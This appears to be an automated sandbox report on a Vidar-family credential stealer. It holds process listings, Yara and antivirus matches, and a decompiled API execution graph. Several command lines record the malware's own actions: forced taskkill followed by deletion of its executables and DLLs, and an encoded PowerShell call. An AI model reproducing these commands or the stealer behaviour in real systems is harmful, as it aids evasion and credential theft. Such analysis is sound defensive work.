                                                                                                                                                                      Target ID:29
                                                                                                                                                                      Start time:18:26:16
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1816,i,4998864990956341523,321811726047907557,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:30
                                                                                                                                                                      Start time:18:26:20
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:1810960 bytes
                                                                                                                                                                      MD5 hash:63FD052610279F9EB9F1FEE8E262F2A4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000003.379532614.0000000002293000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 45%, Metadefender, Browse
                                                                                                                                                                      • Detection: 42%, ReversingLabs

                                                                                                                                                                      Target ID:31
                                                                                                                                                                      Start time:18:26:24
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\WW1.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Company\NewProduct\WW1.exe"
                                                                                                                                                                      Imagebase:0x180000
                                                                                                                                                                      File size:289792 bytes
                                                                                                                                                                      MD5 hash:86C2F03BBB61BDCAF1AE4BFB22CC2D31
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001F.00000002.742694757.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.749365318.000000000159A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001F.00000000.344396019.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                      Target ID:33
                                                                                                                                                                      Start time:18:26:34
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:35
                                                                                                                                                                      Start time:18:26:56
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit
                                                                                                                                                                      Imagebase:0x1b0000
                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:36
                                                                                                                                                                      Start time:18:26:57
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:37
                                                                                                                                                                      Start time:18:26:59
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:taskkill /im real.exe /f
                                                                                                                                                                      Imagebase:0x2f0000
                                                                                                                                                                      File size:74752 bytes
                                                                                                                                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:38
                                                                                                                                                                      Start time:18:27:00
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:timeout /t 6
                                                                                                                                                                      Imagebase:0x9d0000
                                                                                                                                                                      File size:26112 bytes
                                                                                                                                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:39
                                                                                                                                                                      Start time:18:27:03
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8304 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:40
                                                                                                                                                                      Start time:18:27:13
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
                                                                                                                                                                      Imagebase:0x640000
                                                                                                                                                                      File size:350301568 bytes
                                                                                                                                                                      MD5 hash:CE25658AC9291C713590B834D96406BB
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                                                      Target ID:41
                                                                                                                                                                      Start time:18:27:17
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7704 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:42
                                                                                                                                                                      Start time:18:27:18
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7968 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:43
                                                                                                                                                                      Start time:18:27:23
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                      Imagebase:0x7ff76c9a0000
                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:44
                                                                                                                                                                      Start time:18:27:24
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff6f9750000
                                                                                                                                                                      File size:2851656 bytes
                                                                                                                                                                      MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:50
                                                                                                                                                                      Start time:18:28:17
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit
                                                                                                                                                                      Imagebase:0x7ff72c520000
                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:51
                                                                                                                                                                      Start time:18:28:18
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:52
                                                                                                                                                                      Start time:18:28:22
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:taskkill /im brokerius.exe /f
                                                                                                                                                                      Imagebase:0x2f0000
                                                                                                                                                                      File size:74752 bytes
                                                                                                                                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:53
                                                                                                                                                                      Start time:18:28:23
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:timeout /t 6
                                                                                                                                                                      Imagebase:0x9d0000
                                                                                                                                                                      File size:26112 bytes
                                                                                                                                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:55
                                                                                                                                                                      Start time:18:29:02
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
                                                                                                                                                                      Imagebase:0x2b0000
                                                                                                                                                                      File size:430592 bytes
                                                                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                                                      Target ID:56
                                                                                                                                                                      Start time:18:29:03
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:10.3%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:73.3%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:607
                                                                                                                                                                        Total number of Limit Nodes:7
                                                                                                                                                                        execution_graph 23258 413410 23259 41341a 23258->23259 23262 413430 23259->23262 23263 41347d _check_managed_app 23262->23263 23276 422620 HeapCreate 23263->23276 23265 4134bb _fast_error_exit 23278 41b820 23265->23278 23267 4134d1 __amsg_exit __RTC_Initialize _fast_error_exit 23290 422380 23267->23290 23269 413518 __amsg_exit ___setargv __setenvp 23294 41d250 23269->23294 23271 41354a __amsg_exit __wincmdln 23272 4135a8 23271->23272 23300 41d2f0 RtlEncodePointer _doexit 23271->23300 23301 41d330 RtlEncodePointer _doexit 23272->23301 23275 41341f 23277 42264a ___sbh_heap_init __heap_init 23276->23277 23277->23265 23279 41b832 __crt_wait_module_handle 23278->23279 23289 41b83e __encode_pointer __initptd __mtterm __nh_malloc_dbg __mtinitlocks 23279->23289 23302 41d7a0 23279->23302 23284 41b630 __encode_pointer RtlEncodePointer 23285 41b941 23284->23285 23286 41b630 __encode_pointer RtlEncodePointer 23285->23286 23287 41b955 23286->23287 23288 41b630 __encode_pointer RtlEncodePointer 23287->23288 23288->23289 23289->23267 23291 42239f 23290->23291 23293 4223dc 23291->23293 23317 414f50 __VEC_memcpy 23291->23317 23293->23269 23295 41d25f __IsNonwritableInCurrentImage 23294->23295 23318 42d200 23295->23318 23297 41d282 __initterm_e 23299 41d29d __IsNonwritableInCurrentImage __initterm 23297->23299 23322 413e50 __VEC_memcpy RtlEncodePointer _atexit 23297->23322 23299->23271 23300->23272 23301->23275 23313 41b700 23302->23313 23304 41d7ab __initp_misc_winsig __init_pointers 23316 41bef0 RtlEncodePointer __encode_pointer 23304->23316 23306 41d80b 23307 41b630 __encode_pointer RtlEncodePointer 23306->23307 23308 41b922 23307->23308 23309 41b630 23308->23309 23310 41b64b __crt_wait_module_handle 23309->23310 23311 41b6b3 RtlEncodePointer 23310->23311 23312 41b6bd 23310->23312 23311->23312 23312->23284 23314 41b630 __encode_pointer RtlEncodePointer 23313->23314 23315 41b70c 23314->23315 23315->23304 23316->23306 23317->23293 23319 42d20f 23318->23319 23320 42d23d 23319->23320 23321 41b630 __encode_pointer RtlEncodePointer 23319->23321 23320->23297 23321->23319 23322->23299 23323 424366 23324 42436d ___crtExitProcess 23323->23324 23325 42439b RtlAllocateHeap 23324->23325 23326 424400 23325->23326 23327 6dbf8b 23328 6dbf9a 23327->23328 23331 6dc72b 23328->23331 23333 6dc746 23331->23333 23332 6dc74f CreateToolhelp32Snapshot 23332->23333 23334 6dc76b Module32First 23332->23334 23333->23332 23333->23334 23335 6dc77a 23334->23335 23337 6dbfa3 23334->23337 23338 6dc3ea 23335->23338 23339 6dc415 23338->23339 23340 6dc426 VirtualAlloc 23339->23340 23341 6dc45e 23339->23341 23340->23341 23341->23341 23342 40776f 23444 40100b LoadLibraryW 23342->23444 23346 407793 23465 404027 23346->23465 23349 4077f6 ExitProcess 23350 4077eb CreateMutexW 23351 4077fe 23350->23351 23888 40a0be GetCurrentProcess OpenProcessToken 23351->23888 23353 407803 23898 408619 LocalAlloc 23353->23898 23355 407870 23356 40a5fa RegOpenKeyExW RegQueryValueExW RegCloseKey 23355->23356 23357 40789d 23356->23357 23358 40a672 GetUserNameW 23357->23358 23359 4078a4 23358->23359 23360 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23359->23360 23361 4078be 23360->23361 23362 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23361->23362 23363 4078cb 23362->23363 23364 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23363->23364 23365 4078d4 23364->23365 23366 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23365->23366 23367 4078e1 23366->23367 23368 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23367->23368 23369 4078eb LocalFree LocalFree LocalFree 23368->23369 23374 407920 23369->23374 23371 40a4c2 LocalAlloc MultiByteToWideChar 23371->23374 23372 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23372->23374 23373 407c62 14 API calls 23373->23374 23374->23371 23374->23372 23374->23373 23375 407995 LocalFree 23374->23375 23376 407976 LocalFree 23374->23376 23378 407993 23374->23378 23380 4079a6 LocalFree LocalFree 23375->23380 23376->23374 23377 407980 LocalFree 23376->23377 23377->23374 23378->23380 23381 4079c6 23380->23381 23382 40a24a 6 API calls 23381->23382 23383 4079d1 23382->23383 23384 407c45 LocalFree LocalFree ExitProcess 23383->23384 23385 40864c 35 API calls 23383->23385 23386 4079e3 23385->23386 23387 4079ff ExitProcess 23386->23387 23388 4079f7 23386->23388 23389 40a3e4 LocalAlloc LocalFree 23388->23389 23390 407a2f 23389->23390 23391 407a35 ExitProcess 23390->23391 23392 407a3d 23390->23392 23393 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23392->23393 23394 407a47 LocalFree 23393->23394 23395 407a61 23394->23395 23396 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23395->23396 23397 407a7a 23396->23397 23398 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23397->23398 23399 407a87 23398->23399 23400 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23399->23400 23401 407aae 23400->23401 23402 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23401->23402 23403 407abb SetCurrentDirectoryW 23402->23403 23404 407ad6 GetEnvironmentVariableW 23403->23404 23405 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23404->23405 23406 407af7 23405->23406 23407 40a503 lstrlenW lstrlenW LocalAlloc GlobalFree 23406->23407 23408 407b01 SetEnvironmentVariableW LocalFree 23407->23408 23409 409906 122 API calls 23408->23409 23410 407b1e LoadLibraryW 23409->23410 23411 407b3a LoadLibraryW 23410->23411 23412 407b2f 23410->23412 23414 407b94 23411->23414 23415 407b4d SHGetSpecialFolderPathW 23411->23415 23413 403f9d 232 API calls 23412->23413 23417 407b38 23413->23417 23416 40a7da 99 API calls 23414->23416 23421 4065d8 GetProcAddress 23415->23421 23418 407b9d 23416->23418 23417->23411 23420 40abd8 78 API calls 23418->23420 23422 407ba6 23420->23422 23423 407b73 23421->23423 23425 4055b6 132 API calls 23422->23425 23424 407b86 LocalFree 23423->23424 23426 40633e 115 API calls 23423->23426 23424->23414 23428 407baf 23425->23428 23426->23424 23429 409bd9 90 API calls 23428->23429 23430 407bb8 23429->23430 23431 404f7e 89 API calls 23430->23431 23432 407bc1 LocalAlloc 23431->23432 23434 408a42 LocalAlloc LocalFree LocalAlloc LocalFree 23432->23434 23435 407be3 23434->23435 23436 407bf0 LocalFree 23435->23436 23437 408add 67 API calls 23435->23437 23438 4073c7 39 API calls 23436->23438 23437->23436 23439 407c00 23438->23439 23440 407c07 FreeLibrary 23439->23440 23441 407c0e DeleteFileW LocalFree 23439->23441 23440->23441 23442 407c26 FreeLibrary 23441->23442 23443 407c2d DeleteFileW LocalFree LocalFree 23441->23443 23442->23443 23443->23384 23445 401027 GetProcAddress LoadLibraryW LoadLibraryW LoadLibraryW 23444->23445 23446 40177d CoInitialize 23444->23446 23447 401073 LoadLibraryW LoadLibraryW LoadLibraryW GetProcAddress 23445->23447 23463 40a4c2 23446->23463 23449 4010ca GetProcAddress 23447->23449 23451 4012aa GetProcAddress 23449->23451 23453 40137c GetProcAddress 23451->23453 23455 4014de GetProcAddress 23453->23455 23456 4014ff GetProcAddress 23455->23456 23458 4015d4 GetProcAddress 23456->23458 23460 401709 GetProcAddress 23458->23460 23461 401727 GetProcAddress GetProcAddress 23460->23461 23461->23446 23464 40a4cf LocalAlloc MultiByteToWideChar 23463->23464 23464->23346 23903 409f79 LocalAlloc 23465->23903 23468 409f79 LocalAlloc 23469 404051 23468->23469 23470 409f79 LocalAlloc 23469->23470 23471 404067 23470->23471 23472 409f79 LocalAlloc 23471->23472 23473 40407d 23472->23473 23474 409f79 LocalAlloc 23473->23474 23475 404093 23474->23475 23476 409f79 LocalAlloc 23475->23476 23477 4040a9 23476->23477 23478 409f79 LocalAlloc 23477->23478 23479 4040bf 23478->23479 23480 409f79 LocalAlloc 23479->23480 23481 4040d5 23480->23481 23482 409f79 LocalAlloc 23481->23482 23483 4040eb 23482->23483 23484 409f79 LocalAlloc 23483->23484 23485 404101 23484->23485 23486 409f79 LocalAlloc 23485->23486 23487 404117 23486->23487 23488 409f79 LocalAlloc 23487->23488 23489 40412d 23488->23489 23490 409f79 LocalAlloc 23489->23490 23491 404145 23490->23491 23492 409f79 LocalAlloc 23491->23492 23493 40415b 23492->23493 23494 409f79 LocalAlloc 23493->23494 23495 404171 23494->23495 23496 409f79 LocalAlloc 23495->23496 23497 404187 23496->23497 23498 409f79 LocalAlloc 23497->23498 23499 4041a0 23498->23499 23500 409f79 LocalAlloc 23499->23500 23501 4041ba 23500->23501 23502 409f79 LocalAlloc 23501->23502 23503 4041cf 23502->23503 23504 409f79 LocalAlloc 23503->23504 23505 4041e4 23504->23505 23506 409f79 LocalAlloc 23505->23506 23507 4041f9 23506->23507 23508 409f79 LocalAlloc 23507->23508 23509 40420e 23508->23509 23510 409f79 LocalAlloc 23509->23510 23511 404223 23510->23511 23512 409f79 LocalAlloc 23511->23512 23513 404238 23512->23513 23514 409f79 LocalAlloc 23513->23514 23515 40424d 23514->23515 23516 409f79 LocalAlloc 23515->23516 23517 40425f 23516->23517 23518 409f79 LocalAlloc 23517->23518 23519 404274 23518->23519 23520 409f79 LocalAlloc 23519->23520 23521 40428a 23520->23521 23522 409f79 LocalAlloc 23521->23522 23523 4042a0 23522->23523 23524 409f79 LocalAlloc 23523->23524 23525 4042b8 23524->23525 23526 409f79 LocalAlloc 23525->23526 23527 4042ce 23526->23527 23528 409f79 LocalAlloc 23527->23528 23529 4042e4 23528->23529 23530 409f79 LocalAlloc 23529->23530 23531 4042fc 23530->23531 23532 409f79 LocalAlloc 23531->23532 23533 404312 23532->23533 23534 409f79 LocalAlloc 23533->23534 23535 404328 23534->23535 23536 409f79 LocalAlloc 23535->23536 23537 40433e 23536->23537 23538 409f79 LocalAlloc 23537->23538 23539 404354 23538->23539 23540 409f79 LocalAlloc 23539->23540 23541 40436a 23540->23541 23542 409f79 LocalAlloc 23541->23542 23543 404380 23542->23543 23544 409f79 LocalAlloc 23543->23544 23545 404396 23544->23545 23546 409f79 LocalAlloc 23545->23546 23547 4043ac 23546->23547 23548 409f79 LocalAlloc 23547->23548 23549 4043c4 23548->23549 23550 409f79 LocalAlloc 23549->23550 23551 4043d9 23550->23551 23552 409f79 LocalAlloc 23551->23552 23553 4043ef 23552->23553 23554 409f79 LocalAlloc 23553->23554 23555 404404 23554->23555 23556 409f79 LocalAlloc 23555->23556 23557 40441a 23556->23557 23558 409f79 LocalAlloc 23557->23558 23559 404430 23558->23559 23560 409f79 LocalAlloc 23559->23560 23561 404446 23560->23561 23562 409f79 LocalAlloc 23561->23562 23563 40445f 23562->23563 23564 409f79 LocalAlloc 23563->23564 23565 404474 23564->23565 23566 409f79 LocalAlloc 23565->23566 23567 40448a 23566->23567 23568 409f79 LocalAlloc 23567->23568 23569 4044a0 23568->23569 23570 409f79 LocalAlloc 23569->23570 23571 4044b6 23570->23571 23572 409f79 LocalAlloc 23571->23572 23573 4044cb 23572->23573 23574 409f79 LocalAlloc 23573->23574 23575 4044e3 23574->23575 23576 409f79 LocalAlloc 23575->23576 23577 4044f9 23576->23577 23578 409f79 LocalAlloc 23577->23578 23579 40450f 23578->23579 23580 409f79 LocalAlloc 23579->23580 23581 404525 23580->23581 23582 409f79 LocalAlloc 23581->23582 23583 40453b 23582->23583 23584 409f79 LocalAlloc 23583->23584 23585 404551 23584->23585 23586 409f79 LocalAlloc 23585->23586 23587 404567 23586->23587 23588 409f79 LocalAlloc 23587->23588 23589 40457d 23588->23589 23590 409f79 LocalAlloc 23589->23590 23591 404593 23590->23591 23592 409f79 LocalAlloc 23591->23592 23593 4045a9 23592->23593 23594 409f79 LocalAlloc 23593->23594 23595 4045c2 23594->23595 23596 409f79 LocalAlloc 23595->23596 23597 4045d8 23596->23597 23598 409f79 LocalAlloc 23597->23598 23599 4045ee 23598->23599 23600 409f79 LocalAlloc 23599->23600 23601 404604 23600->23601 23602 409f79 LocalAlloc 23601->23602 23603 40461a 23602->23603 23604 409f79 LocalAlloc 23603->23604 23605 40462f 23604->23605 23606 409f79 LocalAlloc 23605->23606 23607 404645 23606->23607 23608 409f79 LocalAlloc 23607->23608 23609 40465b 23608->23609 23610 409f79 LocalAlloc 23609->23610 23611 404671 23610->23611 23612 409f79 LocalAlloc 23611->23612 23613 404687 23612->23613 23614 409f79 LocalAlloc 23613->23614 23615 40469d 23614->23615 23616 409f79 LocalAlloc 23615->23616 23617 4046b3 23616->23617 23618 409f79 LocalAlloc 23617->23618 23619 4046c9 23618->23619 23620 409f79 LocalAlloc 23619->23620 23621 4046df 23620->23621 23622 409f79 LocalAlloc 23621->23622 23623 4046f5 23622->23623 23624 409f79 LocalAlloc 23623->23624 23625 40470b 23624->23625 23626 409f79 LocalAlloc 23625->23626 23627 404723 23626->23627 23628 409f79 LocalAlloc 23627->23628 23629 404739 23628->23629 23630 409f79 LocalAlloc 23629->23630 23631 40474f 23630->23631 23632 409f79 LocalAlloc 23631->23632 23633 404765 23632->23633 23634 409f79 LocalAlloc 23633->23634 23635 40477b 23634->23635 23636 409f79 LocalAlloc 23635->23636 23637 404791 23636->23637 23638 409f79 LocalAlloc 23637->23638 23639 4047a7 23638->23639 23640 409f79 LocalAlloc 23639->23640 23641 4047bd 23640->23641 